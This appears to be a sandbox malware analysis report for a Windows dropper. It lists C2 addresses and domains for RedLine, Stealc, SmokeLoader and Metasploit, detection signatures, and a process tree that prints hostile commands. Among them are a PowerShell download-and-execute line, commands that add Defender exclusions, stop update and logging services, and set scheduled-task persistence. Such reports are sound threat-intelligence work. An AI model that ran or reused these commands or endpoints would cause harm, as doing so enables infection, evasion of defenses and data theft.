asyncrat | 1dfb7d09daa0bece4197d998a72acac7deebaf2ff54b4461667495a41240d0e8

Resubmissions

29-01-2024 12:18

240129-pg3mqsbaap 10

21-01-2024 16:07

240121-tkz38sefc2 10

Analysis

max time kernel
8s
max time network
306s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
29-01-2024 12:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://maxximbrasil.com/themes/config_20.ps1

Extracted

Family

redline

Botnet

adel

62.233.51.177:14107

Attributes

auth_value
6ba5b78fc0fccdad3cc87ea2ca866fc2

Extracted

Family

stealc

http://185.172.128.79

Attributes

url_path
/3886d2276f6914c4.php

rc4.plain

Extracted

Family

smokeloader

Version

2022

http://selebration17io.io/index.php

http://vacantion18ffeu.cc/index.php

http://valarioulinity1.net/index.php

http://buriatiarutuhuob.net/index.php

http://cassiosssionunu.me/index.php

http://sulugilioiu19.net/index.php

http://goodfooggooftool.net/index.php

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32

Extracted

Family

metasploit

Version

windows/reverse_tcp

193.117.208.148:7800

Extracted

Family

redline

193.26.115.228:19267

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

redline

Botnet

LogsDiller Cloud (Telegram: @logsdillabot)

51.210.137.6:47909

Attributes

auth_value
c2955ed3813a798683a185a82e949f88

Extracted

Family

redline

Botnet

socicalbot

149.28.205.74:2470

Attributes

auth_value
9c51f0d7102febd61d441fffb9c4bb47

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe	family_xworm

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral4/memory/4828-98-0x0000000000400000-0x0000000000432000-memory.dmp	family_redline
behavioral4/memory/4484-354-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline
behavioral4/memory/4892-642-0x0000000000400000-0x0000000000432000-memory.dmp	family_redline
behavioral4/memory/4460-716-0x0000000000400000-0x0000000000432000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\Files\sadsadsadsa.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe	xmrig

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\client.exe	asyncrat

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3476 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

pid	process
3476	netsh.exe

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral4/memory/4056-341-0x0000000002620000-0x0000000002686000-memory.dmp	net_reactor
behavioral4/memory/4056-343-0x0000000004B10000-0x0000000004B74000-memory.dmp	net_reactor
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe	net_reactor

Executes dropped EXE 8 IoCs

Processes:

tuc4.exetuc4.tmpc4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exesyncUpd.exeSecurityHealthSystray.exeFreeMP3CutterJoiner.exeAztec.exefile.exe

pid	process
4624	tuc4.exe
1304	tuc4.tmp
400	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
1656	syncUpd.exe
1520	SecurityHealthSystray.exe
2268	FreeMP3CutterJoiner.exe
1284	Aztec.exe
2900	file.exe

Loads dropped DLL 3 IoCs

Processes:

tuc4.tmp

pid process

1304 tuc4.tmp
1304 tuc4.tmp
1304 tuc4.tmp
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

5260 icacls.exe

pid	process
1304	tuc4.tmp
1304	tuc4.tmp
1304	tuc4.tmp

pid	process
5260	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\lolMiner.exe	upx
C:\Users\Admin\AppData\Local\Temp\Files\adm_atu.exe	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\1230.exe	vmprotect

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

Processes:

flow	ioc
118	bitbucket.org
664	raw.githubusercontent.com
736	raw.githubusercontent.com
3	raw.githubusercontent.com
6	raw.githubusercontent.com
29	bitbucket.org
68	bitbucket.org

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ip-api.com
58 api.2ip.ua
68 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe

description pid process target process

PID 400 set thread context of 4828 400 c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe vbc.exe

flow	ioc
13	ip-api.com
58	api.2ip.ua
68	ip-api.com

description	pid	process	target process
PID 400 set thread context of 4828	400	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe	vbc.exe

Launches sc.exe 29 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
3832	sc.exe
788	sc.exe
4644	sc.exe
3892	sc.exe
5272	sc.exe
7064	sc.exe
2732	sc.exe
5228	sc.exe
1560	sc.exe
4768	sc.exe
1064	sc.exe
4704	sc.exe
4336	sc.exe
2380	sc.exe
2608	sc.exe
3152	sc.exe
2016	sc.exe
5144	sc.exe
5168	sc.exe
1812	sc.exe
4184	sc.exe
6004	sc.exe
4216	sc.exe
6836	sc.exe
3420	sc.exe
2616	sc.exe
5520	sc.exe
5448	sc.exe
4136	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 37 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
440	400	WerFault.exe	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
3908	2988	WerFault.exe	7b0d48dbbf50fe239f1097f5d01c2a6d.exe
1392	1936	WerFault.exe	RegAsm.exe
2992	5012	WerFault.exe	tel.exe
2220	2472	WerFault.exe	jjj.exe
1936	668	WerFault.exe	9.exe
2220	4468	WerFault.exe	96B1.exe
1056	1708	WerFault.exe	67CE.exe
2356	1708	WerFault.exe	67CE.exe
4336	3476	WerFault.exe	AA79.exe
596	3476	WerFault.exe	AA79.exe
3512	2036	WerFault.exe	125323166.exe
2368	3476	WerFault.exe	AA79.exe
3000	4240	WerFault.exe	gvrdtbj
5188	3476	WerFault.exe	AA79.exe
5444	3476	WerFault.exe	AA79.exe
5628	3476	WerFault.exe	AA79.exe
6136	3476	WerFault.exe	AA79.exe
5696	3476	WerFault.exe	AA79.exe
5836	32	WerFault.exe	3F8.exe
4372	2052	WerFault.exe	gookcom.exe
5740	5840	WerFault.exe	B9BC.exe
5384	5888	WerFault.exe	RegAsm.exe
5700	5888	WerFault.exe	RegAsm.exe
6120	5156	WerFault.exe	8EC4.exe
5544	5156	WerFault.exe	8EC4.exe
5324	5408	WerFault.exe	Project_8.exe
5776	3680	WerFault.exe	AA79.exe
5464	3680	WerFault.exe	AA79.exe
4732	3680	WerFault.exe	AA79.exe
5348	3680	WerFault.exe	AA79.exe
5736	3680	WerFault.exe	AA79.exe
5460	3680	WerFault.exe	AA79.exe
4820	3680	WerFault.exe	AA79.exe
3344	3680	WerFault.exe	AA79.exe
4604	3680	WerFault.exe	AA79.exe
3516	3680	WerFault.exe	AA79.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeSCHTASKS.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2292	schtasks.exe
2368	schtasks.exe
3580	SCHTASKS.exe
4032	schtasks.exe
5320	schtasks.exe
3728	schtasks.exe
4544	schtasks.exe
560	schtasks.exe
5328	schtasks.exe

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

1268 timeout.exe
3864 timeout.exe
4596 timeout.exe
6036 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

5244 WMIC.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

804 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

tuc4.tmp

pid process

1304 tuc4.tmp
1304 tuc4.tmp
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

4363463463464363463463463.exe

description pid process

Token: SeDebugPrivilege 4276 4363463463464363463463463.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

tuc4.tmp

pid process

1304 tuc4.tmp

pid	process
1268	timeout.exe
3864	timeout.exe
4596	timeout.exe
6036	timeout.exe

pid	process
5244	WMIC.exe

pid	process
804	PING.EXE

pid	process
1304	tuc4.tmp
1304	tuc4.tmp

description	pid	process
Token: SeDebugPrivilege	4276	4363463463464363463463463.exe

pid	process
1304	tuc4.tmp

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

4363463463464363463463463.exetuc4.exec4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exetuc4.tmp51B5.exe

description	pid	process	target process
PID 4276 wrote to memory of 4624	4276	4363463463464363463463463.exe	tuc4.exe
PID 4276 wrote to memory of 4624	4276	4363463463464363463463463.exe	tuc4.exe
PID 4276 wrote to memory of 4624	4276	4363463463464363463463463.exe	tuc4.exe
PID 4624 wrote to memory of 1304	4624	tuc4.exe	tuc4.tmp
PID 4624 wrote to memory of 1304	4624	tuc4.exe	tuc4.tmp
PID 4624 wrote to memory of 1304	4624	tuc4.exe	tuc4.tmp
PID 4276 wrote to memory of 400	4276	4363463463464363463463463.exe	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
PID 4276 wrote to memory of 400	4276	4363463463464363463463463.exe	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
PID 4276 wrote to memory of 400	4276	4363463463464363463463463.exe	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
PID 400 wrote to memory of 4828	400	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe	vbc.exe
PID 400 wrote to memory of 4828	400	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe	vbc.exe
PID 400 wrote to memory of 4828	400	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe	vbc.exe
PID 400 wrote to memory of 4828	400	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe	vbc.exe
PID 400 wrote to memory of 4828	400	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe	vbc.exe
PID 4276 wrote to memory of 1656	4276	4363463463464363463463463.exe	syncUpd.exe
PID 4276 wrote to memory of 1656	4276	4363463463464363463463463.exe	syncUpd.exe
PID 4276 wrote to memory of 1656	4276	4363463463464363463463463.exe	syncUpd.exe
PID 1304 wrote to memory of 3324	1304	tuc4.tmp	51B5.exe
PID 1304 wrote to memory of 3324	1304	tuc4.tmp	51B5.exe
PID 1304 wrote to memory of 3324	1304	tuc4.tmp	51B5.exe
PID 1304 wrote to memory of 1520	1304	tuc4.tmp	SecurityHealthSystray.exe
PID 1304 wrote to memory of 1520	1304	tuc4.tmp	SecurityHealthSystray.exe
PID 1304 wrote to memory of 1520	1304	tuc4.tmp	SecurityHealthSystray.exe
PID 3324 wrote to memory of 3176	3324	51B5.exe	powershell.exe
PID 3324 wrote to memory of 3176	3324	51B5.exe	powershell.exe
PID 3324 wrote to memory of 3176	3324	51B5.exe	powershell.exe
PID 1304 wrote to memory of 2268	1304	tuc4.tmp	FreeMP3CutterJoiner.exe
PID 1304 wrote to memory of 2268	1304	tuc4.tmp	FreeMP3CutterJoiner.exe
PID 1304 wrote to memory of 2268	1304	tuc4.tmp	FreeMP3CutterJoiner.exe
PID 4276 wrote to memory of 1284	4276	4363463463464363463463463.exe	Aztec.exe
PID 4276 wrote to memory of 1284	4276	4363463463464363463463463.exe	Aztec.exe
PID 4276 wrote to memory of 2900	4276	4363463463464363463463463.exe	file.exe
PID 4276 wrote to memory of 2900	4276	4363463463464363463463463.exe	file.exe
PID 4276 wrote to memory of 2900	4276	4363463463464363463463463.exe	file.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4276

C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4624

C:\Users\Admin\AppData\Local\Temp\is-43U6B.tmp\tuc4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-43U6B.tmp\tuc4.tmp" /SL5="$D006C,7936204,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1304

C:\Users\Admin\AppData\Local\Free MP3 Cutter Joiner\FreeMP3CutterJoiner.exe
"C:\Users\Admin\AppData\Local\Free MP3 Cutter Joiner\FreeMP3CutterJoiner.exe" -i
4⤵
PID:1520

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 29
4⤵
PID:3324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 29
5⤵
PID:3176

C:\Users\Admin\AppData\Local\Free MP3 Cutter Joiner\FreeMP3CutterJoiner.exe
"C:\Users\Admin\AppData\Local\Free MP3 Cutter Joiner\FreeMP3CutterJoiner.exe" -s
4⤵
- Executes dropped EXE
PID:2268

C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 252
3⤵
- Program crash
PID:440

C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
2⤵
- Executes dropped EXE
PID:1656

C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe"
2⤵
- Executes dropped EXE
PID:1284

C:\Users\Admin\AppData\Local\Temp\Files\file.exe
"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
2⤵
- Executes dropped EXE
PID:2900

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')"
3⤵
PID:2720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')
4⤵
PID:2668

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\file.exe" >> NUL
3⤵
PID:848

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:804

C:\Users\Admin\AppData\Local\Temp\Files\987123.exe
"C:\Users\Admin\AppData\Local\Temp\Files\987123.exe"
2⤵
PID:4324

C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"
2⤵
PID:512

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
3⤵
PID:2500

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
3⤵
PID:1116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"
3⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
2⤵
PID:2368

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
3⤵
PID:4252

C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe
"C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe"
2⤵
PID:1812

C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
3⤵
PID:4476

C:\Users\Admin\AppData\Local\Temp\7b0d48dbbf50fe239f1097f5d01c2a6d.exe
"C:\Users\Admin\AppData\Local\Temp\7b0d48dbbf50fe239f1097f5d01c2a6d.exe"
3⤵
PID:2988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 972
4⤵
- Program crash
PID:3908

C:\Users\Admin\AppData\Local\Temp\7b0d48dbbf50fe239f1097f5d01c2a6d.exe
"C:\Users\Admin\AppData\Local\Temp\7b0d48dbbf50fe239f1097f5d01c2a6d.exe"
4⤵
PID:4632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:3264

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:1920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:1100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:3176

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
PID:6024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:5752

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:3596

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:5020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:788

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
PID:2488

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:5328

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
PID:6812

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:6760

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
PID:1812

C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"
3⤵
PID:5100

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
4⤵
PID:2728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:4060

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:2024

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
4⤵
- Launches sc.exe
PID:4336

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:2616

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
4⤵
- Launches sc.exe
PID:4644

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
4⤵
- Launches sc.exe
PID:5228

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
4⤵
- Launches sc.exe
PID:5520

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
4⤵
- Launches sc.exe
PID:6004

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
4⤵
PID:5996

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
4⤵
PID:5988

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
4⤵
PID:5980

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
4⤵
PID:5972

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
4⤵
- Launches sc.exe
PID:5448

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
4⤵
- Launches sc.exe
PID:5144

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:5168

C:\Users\Admin\AppData\Local\Temp\rty25.exe
"C:\Users\Admin\AppData\Local\Temp\rty25.exe"
3⤵
PID:2232

C:\Users\Admin\AppData\Local\Temp\Files\uedfh12.exe
"C:\Users\Admin\AppData\Local\Temp\Files\uedfh12.exe"
2⤵
PID:4056

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe"
2⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
2⤵
PID:4964

C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe
"C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe"
2⤵
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe"
3⤵
PID:3520

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
4⤵
- Creates scheduled task(s)
PID:2292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe"
3⤵
PID:4972

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
4⤵
- Creates scheduled task(s)
PID:3728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe"
3⤵
PID:3908

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
4⤵
- Creates scheduled task(s)
PID:4544

C:\Users\Admin\AppData\Local\Temp\Files\dart.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dart.exe"
2⤵
PID:3216

C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
2⤵
PID:3832

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 324
4⤵
- Program crash
PID:1392

C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe"
2⤵
PID:3400

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
3⤵
PID:1980

C:\Windows\Temp\tel.exe
